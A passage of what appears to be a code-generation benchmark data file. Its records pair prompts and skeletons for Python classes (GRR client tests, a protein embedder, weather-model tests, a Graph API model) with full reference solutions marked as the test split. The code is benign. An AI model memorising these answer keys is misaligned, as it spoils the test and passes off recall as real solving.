/sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n", "source": "the_stack_v2_python_sparse", "source_path": "grr/client/grr_response_client/linux/client_utils_linux_test.py", "source_repo": "google/grr", "split": "test", "star_events_count": 4683} {"blob_id": "96748a3bc73d3ec479c89c274e543ead6c08b71d", "bodies": ["self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\nself._batch_size = batch_size\nself._domain = domain\nself._length = length", "if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\nreturn utils.batch_apply(self._embed_fn, sequences, self._batch_size)"], "bodies_text": "<|body_start_0|>\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n<|end_body_1|>\n", "class_docstring": "Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.", "class_name": "ProteinLMEmbedder", "detected_licenses": ["Apache-2.0", "CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n <|body_0|>\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000235", "length_bytes": 8676, "license_type": "permissive", "methods": [{"docstring": "Creates an instance of this class.", "name": "__init__", "signature": "def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64)"}, {"docstring": "Embeds int or string sequences.", "name": "__call__", "signature": "def __call__(self, sequences)"}], "n_methods": 2, "prompt": "Implement the Python class `ProteinLMEmbedder` described below.\n\nClass description:\nEmbeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\n\nMethod signatures and docstrings:\n- def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64): Creates an instance of this class.\n- def __call__(self, sequences): Embeds int or string sequences.", "prompted_full_text": "Implement the Python class `ProteinLMEmbedder` described below.\n\nClass description:\nEmbeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\n\nMethod signatures and docstrings:\n- def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64): Creates an instance of this class.\n- def __call__(self, sequences): Embeds int or string sequences.\n\n<|skeleton|>\nclass ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n <|body_0|>\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n<|end_body_1|>\n", "revision_id": "5573d9c5822f4e866b6692769963ae819cb3f10d", "skeleton": "<|skeleton|>\nclass ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n <|body_0|>\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "protein_lm/embed.py", "source_repo": "Jimmy-INL/google-research", "split": "test", "star_events_count": 1} {"blob_id": "85f47f0d3e6a9c0418d427d00de354e8fc2f4223", "bodies": ["orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\nself.assertIsInstance(orogenh, iris.cube.Cube)\nself.assertEqual(orogenh.data.dtype, 'float32')\nfor coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')", "self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\nself.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\nmsg = 'Input cube coordinates'\nwith self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)", "temperature = set_up_invalid_variable_cube(self.temperature)\nhumidity = set_up_invalid_variable_cube(self.humidity)\npressure = set_up_invalid_variable_cube(self.pressure)\nuwind = set_up_invalid_variable_cube(self.uwind)\nvwind = set_up_invalid_variable_cube(self.vwind)\nmsg = 'Require 2D fields as input; found 3 dimensions'\nwith self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)", "cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\ncopied_cubes = []\nfor cube in cube_list:\n copied_cubes.append(cube.copy())\n_ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\nfor cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)", "expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\norogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\nself.assertArrayAlmostEqual(orogenh.data, expected_data)\nself.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)"], "bodies_text": "<|body_start_0|>\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n<|end_body_0|>\n\n<|body_start_1|>\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n<|end_body_1|>\n\n<|body_start_2|>\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n<|end_body_2|>\n\n<|body_start_3|>\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n<|end_body_3|>\n\n<|body_start_4|>\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n<|end_body_4|>\n", "class_docstring": "Test the process method", "class_name": "Test_process", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-proprietary-license"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n <|body_0|>\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n <|body_1|>\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n <|body_2|>\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n <|body_3|>\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n<|end_body_0|>\n\n<|body_start_1|>\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n<|end_body_1|>\n\n<|body_start_2|>\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n<|end_body_2|>\n\n<|body_start_3|>\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n<|end_body_3|>\n\n<|body_start_4|>\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000236", "length_bytes": 34979, "license_type": "permissive", "methods": [{"docstring": "Test output is float32 cube with float32 coordinates", "name": "test_basic", "signature": "def test_basic(self)"}, {"docstring": "Test error thrown if input variable cubes do not match", "name": "test_unmatched_coords", "signature": "def test_unmatched_coords(self)"}, {"docstring": "Test error thrown if input variable cubes have an extra dimension", "name": "test_extra_dimensions", "signature": "def test_extra_dimensions(self)"}, {"docstring": "Test the process method does not modify any of the input cubes", "name": "test_inputs_unmodified", "signature": "def test_inputs_unmodified(self)"}, {"docstring": "Test values of output", "name": "test_values", "signature": "def test_values(self)"}], "n_methods": 5, "prompt": "Implement the Python class `Test_process` described below.\n\nClass description:\nTest the process method\n\nMethod signatures and docstrings:\n- def test_basic(self): Test output is float32 cube with float32 coordinates\n- def test_unmatched_coords(self): Test error thrown if input variable cubes do not match\n- def test_extra_dimensions(self): Test error thrown if input variable cubes have an extra dimension\n- def test_inputs_unmodified(self): Test the process method does not modify any of the input cubes\n- def test_values(self): Test values of output", "prompted_full_text": "Implement the Python class `Test_process` described below.\n\nClass description:\nTest the process method\n\nMethod signatures and docstrings:\n- def test_basic(self): Test output is float32 cube with float32 coordinates\n- def test_unmatched_coords(self): Test error thrown if input variable cubes do not match\n- def test_extra_dimensions(self): Test error thrown if input variable cubes have an extra dimension\n- def test_inputs_unmodified(self): Test the process method does not modify any of the input cubes\n- def test_values(self): Test values of output\n\n<|skeleton|>\nclass Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n <|body_0|>\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n <|body_1|>\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n <|body_2|>\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n <|body_3|>\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n<|end_body_0|>\n\n<|body_start_1|>\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n<|end_body_1|>\n\n<|body_start_2|>\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n<|end_body_2|>\n\n<|body_start_3|>\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n<|end_body_3|>\n\n<|body_start_4|>\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n<|end_body_4|>\n", "revision_id": "cd2c9019944345df1e703bf8f625db537ad9f559", "skeleton": "<|skeleton|>\nclass Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n <|body_0|>\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n <|body_1|>\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n <|body_2|>\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n <|body_3|>\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n", "source": "the_stack_v2_python_sparse", "source_path": "improver_tests/orographic_enhancement/test_OrographicEnhancement.py", "source_repo": "metoppv/improver", "split": "test", "star_events_count": 101} {"blob_id": "c07a401830d632ef7bafa71e103416f0a42c3819", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn UnifiedRoleManagementPolicy()", "from .entity import Entity\nfrom .identity import Identity\nfrom .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\nfrom .entity import Entity\nfrom .identity import Identity\nfrom .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\nfields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_str_value('description', self.description)\nwriter.write_str_value('displayName', self.display_name)\nwriter.write_collection_of_object_values('effectiveRules', self.effective_rules)\nwriter.write_bool_value('isOrganizationDefault', self.is_organization_default)\nwriter.write_object_value('lastModifiedBy', self.last_modified_by)\nwriter.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\nwriter.write_collection_of_object_values('rules', self.rules)\nwriter.write_str_value('scopeId', self.scope_id)\nwriter.write_str_value('scopeType', self.scope_type)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "UnifiedRoleManagementPolicy", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UnifiedRoleManagementPolicy:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 